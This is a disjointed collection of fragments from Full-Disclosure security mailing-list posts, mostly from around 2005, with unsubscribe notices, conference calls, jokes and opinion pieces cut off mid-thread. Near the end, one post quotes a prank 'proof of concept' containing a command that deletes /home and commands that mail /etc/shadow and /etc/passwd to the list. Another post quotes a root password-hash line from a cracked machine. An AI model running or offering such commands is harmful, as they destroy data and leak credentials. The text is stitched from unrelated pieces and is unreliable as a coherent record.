Julius hit the nail on the head here. Transaction malleability is not some
heretofore undiscovered bug in the Bitcoin implementation. It was a known
entity long ago, and presumably with the creator(s)' awareness. It really isn’t
a problem itself; it’s perfectly mitigable with the correct
Please unsubscribe. Address to be inactive.
-Original Message-
From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk] On
Behalf Of ESNC Security
Sent: Monday, May 6, 2013 10:31 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] [ESNC-2013-005] Remote
Please unsubscribe. Address to be inactive
-Original Message-
From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk] On
Behalf Of MustLive
Sent: Monday, May 6, 2013 4:45 PM
To: submissi...@packetstormsecurity.org; full-disclosure@lists.grok.org.uk;
1337 Exploit
Email address to be inactive. Please unsubscribe.
-Original Message-
From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk] On
Behalf Of SEC Consult Vulnerability Lab
Sent: Tuesday, May 7, 2013 12:57 AM
To: bugtraq; full-disclosure@lists.grok.org.uk
Subject:
You're correct that time machines don't exist yet. However, this is
proof that they'll be invented in the next five months.
Stay tuned!
Mike Bann wrote:
I highly doubt you reported this to Mozilla in September of 2009. I
don't think time machines like that exist yet, but I'd be pleased to be
Ivan . wrote:
The BBC hacked into 22,000 computers as part of an investigation into
cybercrime but the move quickly backfired, with legal experts claiming
the broadcaster broke the law and security gurus saying the experiment
went too far.
that supporting the bot-runners is a bad idea, but I don't think
that paying them for their bots puts them on equal footing.
(In my humble opinion, of course)
Ron
--
http://www.skullsecurity.org/
___
Full-Disclosure - We believe in it.
Charter: http
For those of you that may be interested:
*Call for Papers Hack.lu 2008*
The purpose of the hack.lu convention is to give an open and free playground
where people can discuss the implication of new technologies in society.
hack.lu is a balanced mix convention where technical and non-technical
to FD since some date.
2) Covert communication, or that the exploits were really secret
messages between t3rr0ri$ts or something.
I'm sure there exists a motive beyond just spamming us to be
annoying. Anyone have any new ideas, or good arguments for either of
the above two ideas?
Ron
, if the site is malicious,
better the app die and dump than allow one to proceed to inflict harm upon
oneself?
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
***testing, only testing, and damn good
Can anybody tell me if there is a simple CTF ruleset that maybe has its
own accompanying distro that others can play?
Hi Tim,
You make a great point.
Ron Jennings, NCIE SSP
Chaser Security- A Microsoft Partner
Cell:559.360.2340 24hr.customer service
VOIP:562.365.1295
From: Tim [EMAIL PROTECTED]
To: "pdp (architect)" [EMAIL PROTECTED]
CC: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hi,
Hadmut Danisch wrote:
Your assumption is false here. The kernel maintainers DO NOT say this:
Read the README file, it does not contain any statement that you do
not have to compile as root. They silently explain how to compile if
you are not
, somewhere is a pc with a vulnerable application, guess where it
is and you can own it. Oh, but, pay me big bucks first so I can eat well
for a day or two.
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
This is my last ever Full-Disclosure post...
...and there was much rejoicing.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. If nothing comes
up, perhaps I'll generate my own tables, but I'd rather not spend months
doing it.
Thanks,
Ron
to consider is that a mere user level shell likely lacks
privs to do some of the nasties referenced in some of these posts. thus,
the friend would not only have to allow shell access, but also give away
root on the server as well.
Just a minor point.
Thanks,
Ron DuFresne
--
Sometimes you get
Aha, the C killed me. That's exactly why I should never trust my
memory! :)
Thanks for putting my mind at ease!
Ron
B Potter wrote:
shmoo has no c. that was the first problem :)
Also, we are right now in the process of migrating the tables to a new
server. Another 48 hours and you
://www.microsoft.com
APPENDIX B. - References
NONE
CONTACT:
*ron [EMAIL PROTECTED]
*1-888-LOL-WHAT
*CISSP GSAE CCE CEH CSFA GREM SSP-CNSA SSP-MPA GIPS GHTQ GWAS
checking if this address works on the list
teh kids wrote:
i suppose its about time i passed this on.
http://www.geocities.com/teh_kids/index.html
it reminds me of the windoze 95 days, not seen _anything_ like this for
a long long time.
In case anybody cares, this does NOT work on
Some versions of Nessus can log in through SSH and check the system
locally. I'm unsure if Retina can do that, but it wouldn't surprise me.
Joshua Russel wrote:
It is a local vulnerability, then how does Retina claim to scan it remotely?
On 12/13/05, Advisories [EMAIL PROTECTED] wrote:
I was also unable to replicate it, on Firefox 1.5 i386 Linux EN
[EMAIL PROTECTED] wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
nor a fake, nor you really don't know what is a buffer overflow, but for
sure here on my firefox 1.5 EN, the client is much longer to load to
the next boot
, be careful! As I said, I nearly got burnt by this, luckily I
noticed it before anybody malicious did.
Ron
I'm hosting a bit of a hoax this week (to celebrate December Fool's Day,
not to be confused with April Fool's Day, which is real).
What I need is some log files that seem to indicate an attack. I
already posted some FTP brute-force-looking stuff, but it was pretty weak.
Anybody got some
Calling someone else a kid
just because he has a different mindset or vision is simply childish.
Am I the only one who sees a little bit of irony there?
I took about 2 minutes out of my life several months ago and created
rules in Thunderbird which put all those update messages into a special
folder that I ignore. It wasn't incredibly hard to do, and now I'm
happy AND I didn't have to complain on the list! Win-win!
Rembrandt wrote:
Could
, let alone that CISSP is the only real
qualification for the claim.
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D
Hi,
For those of you that may be interested. I got this in my inbox.
hack.lu 2005
The purpose of the hack.lu convention is to give an open and free
playground where people can discuss the implication of new
technologies
(mainly security) on society. hack.lu is a balanced convention where
For those of you that are interested in: hack.lu 2005
The purpose of the hack.lu convention is to give an open and free playground where people can discuss the implication of new technologies
(mainly security) on society. hack.lu is a balanced convention where technical and non-technical people can
clients towards matt's
outdated and insecure versions, despite his references and links to the
more secured version of his and other web based scripts that can be
gotten from:
http://nms-cgi.sourceforge.net/scripts.shtml
Unless one is careful they often get what they paid for
Thanks,
Ron
the current
tools that nasty boys and girls are using, does it not? If their tools
rely upon poorly written code, then replacing it with far better code
makes their efforts kinda nil, yes?
Thanks,
Ron DuFresne
Thanks..
On 9/12/05, Ron DuFresne [EMAIL PROTECTED] wrote:
On Mon, 12 Sep 2005
and the
whole set of nearly bi monthly threads that covers it and its variants in
detail.
Yet, where one can limit, limiting access to sshd these days is preferred,
as openssl and the openssh code tend to be quite the problem with
maintenance, almost like the 90's with ftpd and sendmail
Thanks,
Ron
http://www.ranum.com/security/computer_security/papers/a1-firewall/
Thanks,
Ron DuFresne
On Sat, 27 Aug 2005, [EMAIL PROTECTED] wrote:
=
ORIGINAL MESSAGE:
-
Date: Sat, 27 Aug
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
ngrep and netsed are useful.
[EMAIL PROTECTED] wrote:
Hi all,
I forget the name of a tool that can be used to intercept TCP packet and
allow you to modify the packet before it was
sent out. Basically the tool open 2 ports, one for listening and
of bucks, and will continue to line
many pockets for a long time as folks play into the latest and greatest
buzzword of the week/month/year, but when it comes to security, a little
extrapolation of the basics is the real key to any small sense of secure.
Thanks,
Ron DuFresne
On Mon, 22 Aug 2005, Todd
On Fri, 19 Aug 2005, Nick FitzGerald wrote:
[EMAIL PROTECTED] to Ron DuFresne:
Perhaps it does relate considering the above and considering that the unix
world learned many of the evils of RCP services over ten years ago that
seem to hit the M$ realm every few months, repeatedly
it was the QA group..it doesn't
really matter. They got the worm because they were not patched.
And because they didn't properly filter port 445 is my understanding.
Unpatched systems behind FW's that filter 445 were untouched.
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your
, with taxpayers footing the bill, but that's life in gov
settings and more so perhaps in state and county govs that lack the
auditing controls like the GAO smirk
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
On Fri, 29 Jul 2005, KF (lists) wrote:
Trying to Stifle information is a real dickhead thing to do also...
I'm just waiting for someone to toss the DMCA into all of this. =]
CERT and DHS are bigger cards in the game than DMCA.
Thanks,
Ron DuFresne
--
Sometimes you get the blues because
be retired and all this equipment replaced by the
time IPv6 becomes standard the threat is not as great then as it was first
made out to be then, correct?
Thanks,
Ron DuFresne
On Fri, 29 Jul 2005 [EMAIL PROTECTED] wrote:
On Fri, 29 Jul 2005 16:38:26 CDT, Ron DuFresne said:
being that we'll all be retired and all this equipment replaced by the
time IPv6 becomes standard the threat is not as great then as it was first
made out to be then, correct?
Part
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hmm, I'm noticing a pattern.
Warning: don't download exploits from any sites that have an 'o'
replaced with a '0'! The 0 obviously makes them less secure, or
something.
[EMAIL PROTECTED] wrote:
Hackers may be at risk!
It has come to our
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
_Linux_ doesn't have a version 10, either. Linux IS the kernel, which
the versions are 2.x (2.4.* and 2.6.* usually).
Maybe you're talking about a specific distribution? In which case,
that's a pretty inconsistent numbering system to use since Red
to be doing maintenance or
working indirectly from home as usual
Thanks,
Ron DuFresne
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just
reports it as a Friday here also, damn, now I have to drive the 45
miles in for sure!
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
***testing, only testing, and damn good at it too!***
OK, so you're
let me
know. I'd be interested how this can be exploited.
-Ron
// Written by Ron [EMAIL PROTECTED]
// Friday, May 13, 2005
//
// This is a very weak demonstration of Gaim 1.2.1's stack overflow vulnerability
// when processing email addresses. What this basically does is segfault you when
lmao
root = you
kfinisterre = are
dotslash = so
mandark = lame
dognutz = for
elguapo = cracking
m0ssimo = this
KF (lists) wrote:
root:$1$WO0cTkiq$4x/Of2KBx2HRwv/OXmggv1:12741:0:9:7:::
daemon:*:12741:0:9:7:::
bin:*:12741:0:9:7:::
sys:*:12741:0:9:7:::
sync:*:12741:0:9:7:::
The ONLY posts I don't like are posts like that, complaining about the
list. Like somebody else said, the rest of this list provides great
comic relief!
Javi Polo wrote:
On Apr/20/2005, Day Jay wrote:
You are wrong again, it's Smashing the Stick you
moron. Not smashing the stack. Ask anyone
haha, nice:
/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe
cat /etc/shadow |mail full-disclosure@lists.grok.org.uk
cat /etc/passwd |mail full-disclosure@lists.grok.org.uk
lol @ anybody who does it.
Day Jay wrote:
/* Proof of concept code
Please don't send us e-mails
asking us how to hack
it.
Actually, at least in the US, there is a law dang I forget what it's
called that would make this illegal and subject one to prison time...
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
Well, the only reply to that would be:
Since the catholic church say God exists and they have a vested interest
in the matter they must be lying. Therefore God doesn't exist. I rest
my case.
Of course I'd be skeptical of their proof. If the Republicans came out
with proof that Democrats
memories of such events, unless directly affected by the event.
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't
companies choice-point
obtained their data from? Quite often putting pressure on company C is
not a straight forward matter for the public at large.
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
such
things are done is another problem altogether...
Of course, I'm not sure you understand what tripwire is or does, further
research might be in order.
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
point presentations that mgt loves. Course as a
techie, I'd want to see the product working in a live setup prior to
making a perhaps costly blunder.
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
Nor to read the whole announcement Administrivia about the change in
hosting sites and how to change your passwd and how to fix your settings
for the list. The reading impaired should just unsubscribe.
Thanks,
Ron DuFresne
On Wed, 9 Mar 2005 [EMAIL PROTECTED] wrote:
I tend to agree though